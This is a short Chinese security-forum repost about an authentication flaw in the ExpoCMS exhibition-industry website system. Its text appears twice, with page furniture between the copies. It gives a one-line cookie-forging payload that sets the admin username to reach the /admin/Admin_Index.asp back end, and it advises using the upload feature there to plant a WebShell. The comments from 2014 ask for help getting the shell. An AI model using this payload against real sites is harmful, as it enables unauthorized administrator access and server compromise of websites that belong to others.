/admin/CheckLogin.asp:
Exp:
javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")
这样就能进后台了:/admin/Admin_Index.asp,后台有个上传的地方可以拿 WebShell。
留言评论(旧系统):
文章来源于lcx.cc:ExpoCMS展览会行业网站系统后台验证漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
/admin/CheckLogin.asp:
Exp:
javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")
这样就能进后台了:/admin/Admin_Index.asp,后台有个上传的地方可以拿 WebShell。
留言评论(旧系统):
佚名 @ 2014-03-24 02:10:03
具体怎么拿shell呢?
本站回复:
进后台,后台有个上传的地方可以拿 WebShell。
佚名 @ 2014-03-27 22:22:48
就一个上传图片的,试了不行啊。估计是道行不够。大哥能不能指点一下
本站回复:
没用过这个后台,不太了解。
文章来源于lcx.cc:ExpoCMS展览会行业网站系统后台验证漏洞
评论